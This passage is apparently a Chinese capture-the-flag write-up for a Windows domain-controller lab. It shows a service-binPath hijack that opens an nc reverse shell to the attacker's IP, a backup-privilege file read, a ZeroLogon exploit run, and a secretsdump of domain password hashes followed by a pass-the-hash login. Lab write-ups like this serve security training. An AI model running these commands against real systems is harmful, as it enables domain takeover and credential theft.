Local Group Memberships *Remote Management Use*Server Operators
Global Group memberships *Domain Users *Developers
The command completed successfully.
*Evil-WinRM* PS C:\Users\jorden\Documents> 它在Server Operators组中,Server Operators 组中的成员可以管理域控制器。该组仅存在于域控制器上。默认情况下,该组没有成员。Server Operators 组的成员可以交互登录服务器、创建和删除网络共享资源、启动和停止服务、备份和恢复文件、格式化计算机的硬盘驱动器以及关闭计算机。该组无法重命名、删除或移动。
我可以找系统服务,将其执行改写,比如我让他去执行nc为我机器建立一个反向连接的shell,然后将服务重启,那么系统便会加载该服务并建立一个反向连接的shell给我的机器,该shell应该是系统级别的。
获取 Systme Shell:
我可以先传送一个winPEAS,让它帮我枚举我能改写哪些服务,或许这次可以执行,毕竟现在我当前用户可以随意的启动停止服务,如果杀软不老实,我应该可以将其干掉:
*Evil-WinRM* PS C:\Users\jorden\Documents> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\jorden\Documents> ls
Directory: C:\Users\jorden\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/25/2022 8:33 AM 38616 nc.exe
-a---- 4/25/2022 8:36 AM 1936384 winPEASx86.exe
*Evil-WinRM* PS C:\Users\jorden\Documents> .\winPEASx86.exe好吧,我觉得是网络问题,因为Evil-WinRM这东西延迟太大,而winPEAS在执行时会产生很大的信息量,Evil-WinRM无法快速的给我回应,它就会崩溃,或者自己哪里出现问题导致我看不到winPEAS回显:
sc query 查看所有服务的运行状态
sc query 服务名 查看某个服务的运行状态。
sc qc 服务名 查看某个服务的配置信息。
sc start 服务名 启动服务。
sc stop 服务名 停止服务。
sc delete 服务名 删除服务*Evil-WinRM* PS C:\Users\jorden\Documents> sc.exe config browser binPath= "C:\Users\jorden\Documents\nc.exe -e cmd.exe 10.10.16.7 443"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\jorden\Documents> sc.exe stop browser
SERVICE_NAME: browser
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0xafc8
*Evil-WinRM* PS C:\Users\jorden\Documents> sc.exe start browser我可以获取到shell:
$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.179] 49728
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>但是这个shell有问题,准确说是目标browser服务有问题,它一旦检测到被篡改,只能维持一小会儿时间都来不及读取root.txt,它就断开了,而且服务就消失了。
我找到了另一种方法,jorden用户可以对域控服务器任何一个地方做备份或恢复,我可以把管理员目录拷贝到当前目录:
*Evil-WinRM* PS C:\Users\jorden\Documents> robocopy /b C:\users\administrator\desktop .\
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, April 25, 2022 8:58:04 AM
Source : C:\users\administrator\desktop\
Dest : C:\Users\jorden\Documents\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
2 C:\users\administrator\desktop\
*EXTRA Dir -1 C:\Users\jorden\Documents\My Music\
*EXTRA Dir -1 C:\Users\jorden\Documents\My Pictures\
*EXTRA Dir -1 C:\Users\jorden\Documents\My Videos\
New File 488 desktop.ini
0%
100%
New File 34 root.txt
0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 3
Files : 2 2 0 0 0 0
Bytes : 522 522 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Monday, April 25, 2022 8:58:04 AM
*Evil-WinRM* PS C:\Users\jorden\Documents> ls
Directory: C:\Users\jorden\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/25/2022 8:51 AM 34 root.txt
*Evil-WinRM* PS C:\Users\jorden\Documents> type root.txtZeroLogon( CVE-2020-1472):
最后复盘总结时,我又通过搜索引擎查看其他前辈的思路方法,我又知晓了这种方法,漏洞原理我不想写了,这篇文章很长很长了,如果想知道更多细节,可以看这篇:
https://cloud.tencent.com/developer/article/1701663如果用该漏洞打这台靶机很简单很简单,前后不过几分钟,首先用poc跑一遍,简单无脑:
$ python cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179
Performing authentication attempts...
=======================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!再通过impacket中的secretsdump就可以获取到管理员的哈希:
$ ./secretsdump.py -no-pass -just-dc MULTIMASTER\$@10.10.10.179
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:69cbf4a9b7415c9e1caf93d51d971be0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:06e3ae564999dbad74e576cdf0f717d3:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MEGACORP.LOCAL\svc-nas:1103:aad3b435b51404eeaad3b435b51404ee:fe90dcf97ce6511a65151881708d6027:::然后就可以直接登录上去:
$ evil-winrm -u administrator -i 10.10.10.179 --hash 69cbf4a9b7415c9e1caf93d51d971be0
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megacorp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>